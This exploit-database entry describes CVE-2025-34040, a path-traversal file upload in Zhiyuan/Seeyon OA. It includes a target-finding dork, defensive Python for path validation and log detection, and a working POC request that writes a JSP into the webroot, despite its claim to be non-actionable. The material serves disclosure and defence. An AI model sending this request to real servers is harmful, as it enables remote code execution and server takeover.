## https://sploitus.com/exploit?id=PACKETSTORM:218383
# Exploit Title: Zhiyuan OA - arbitrary file upload leading 
# Google Dork / FOFA: app="致远互联-OA" && title="V8.0SP2"
# Date: 1-11-2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://service.seeyon.com/
# Software Link: [vendor download / product page if available]
# Version: 5.0, 5.1–5.6sp1, 6.0–6.1sp2, 7.0–7.1sp1, 8.0–8.0sp2 (per NVD/VulnCheck)
# Tested on: MacOS
# CVE: CVE-2025-34040
    
Description:
A path-traversal / improper-validation flaw in the multipart file upload handling of Zhiyuan OA's `wpsAssistServlet` allows an unauthenticated actor (or any actor able to reach the upload endpoint) to place crafted files outside the intended directories by controlling the `realFileType` and `fileId` parameters. Under affected configurations, an uploaded JSP can be stored in the webroot and executed, yielding remote code execution.

High-level reproduction template (redacted, non-actionable):
POST request to `/seeyon/wpsAssistServlet` with multipart/form-data. The `realFileType` parameter is used to resolve the target path; insufficient validation permits `..` sequences, leading to writes under the webapp root. The uploaded file contents must be controlled to produce a server-side executable file (e.g., JSP); DO NOT include such server-side code here.
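Added example, not Zhiyuan OA's code: the bug class above modelled as an unsafe path join beside a hardened resolver, plus a log check for requests shaped like the PoC. The upload directory, the type allowlist and the way the two parameters are combined are assumptions; the page does not give the servlet's real join logic.

```python
"""Illustrative (hypothetical) upload-path handling for CVE-2025-34040-style bugs."""
import posixpath
from typing import Optional
from urllib.parse import parse_qs, urlsplit

UPLOAD_ROOT = "/opt/seeyon/uploads"      # assumed upload store, not a real product path
ALLOWED_TYPES = {"xls", "doc", "wps"}    # assumed allowlist of document types


def resolve_unsafe(real_file_type: str) -> str:
    """Vulnerable pattern: the attacker-controlled realFileType is joined straight
    onto the upload directory, so '..' segments walk out of UPLOAD_ROOT."""
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, real_file_type))


def resolve_safe(real_file_type: str, file_id: str) -> Optional[str]:
    """Hardened pattern: allowlist the type, restrict the id to an identifier,
    and still verify that the normalised result is contained in UPLOAD_ROOT."""
    if real_file_type not in ALLOWED_TYPES or not file_id.isalnum():
        return None
    target = posixpath.normpath(
        posixpath.join(UPLOAD_ROOT, f"{file_id}.{real_file_type}"))
    # Defence in depth: even a bug in the checks above must not write outside the store.
    if posixpath.commonpath([UPLOAD_ROOT, target]) != UPLOAD_ROOT:
        return None
    return target


def suspicious_upload_request(request_target: str) -> bool:
    """Detection aid for access logs: flag wpsAssistServlet requests whose
    realFileType carries traversal, a path separator or a server-side extension.
    parse_qs percent-decodes, so %2e%2e variants are caught as well."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/seeyon/wpsAssistServlet"):
        return False
    for value in parse_qs(parts.query).get("realFileType", []):
        lowered = value.lower()
        if ".." in lowered or "/" in lowered or lowered.endswith((".jsp", ".jspx")):
            return True
    return False
```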
    
Impact:
- Remote code execution if the uploaded file is accessible and executable.
- Complete server compromise and pivoting to internal networks.
- Data exfiltration, persistence, and further lateral movement.
    
References:
- NVD: CVE-2025-34040 (NVD entry, awaiting enrichment)
- VulnCheck advisory: https://vulncheck.com/advisories/zhiyuan-oa-system-path-traversal-file-upload
- CNVD entry: https://www.cnvd.org.cn/flaw/show/CNVD-2021-01627
- Vendor patch/notice: https://service.seeyon.com/patchtools/tp.html
    
POC:
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=......
Accept-Encoding: gzip
    
--......
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel
    
<% out.println("HelloWorld");%>
--.......--